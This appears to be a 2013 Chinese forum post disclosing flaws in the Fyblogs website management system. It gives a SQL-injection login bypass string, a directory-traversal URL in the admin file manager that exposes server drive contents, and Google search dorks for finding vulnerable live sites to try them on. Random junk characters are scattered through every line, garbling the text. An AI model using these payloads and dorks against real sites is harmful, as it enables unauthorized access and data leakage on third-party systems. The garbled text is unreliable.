漏洞类型: 未授权访问/权限绕过! w6 R- W# ]! r# B
2 G. A, z+ T' K% _3 J- _0 L+ J简要描述:
' O a/ w. n- c/ a% |2 v# D0 Z) k0 M
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!3 _+ S9 ?- Z8 x5 K7 d8 R( @. e. q
) A1 G8 d3 q; u6 e) j
详细说明: l8 Y# x0 e/ V4 C1 D
$ m0 m- s% K: P+ Z6 k后台万能密码 'or'='or'
' n- M" D" L `+ _后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
. l( z3 Y& K! Dadmin/uploadfile.asp?currentFolder=/upfiles/../3 Z. v, G# y8 m- ?9 O" Y6 P7 V, ]
7 F: @3 ~) U$ m( [, Q
漏洞证明:4 {! B8 L. F# r: ^ ~
* f* F6 w j1 h
谷歌:inurl:type.asp?id=1 新闻中心
" r7 V3 E% v" R3 M+ q3 M或者 :inurl:download_ok.asp?
6 V, J4 r6 ]" y6 Y- [0 Q3 I$ j* j- F
( d( U0 V4 Q) i& \+ w0 n可以测试
* [! h ]8 {) s4 T9 u. o% s
" e0 M: H3 G. [% @, h
0 X) K0 t. U9 { |
发表于 2013-3-7 13:07:46
收藏
支持
反对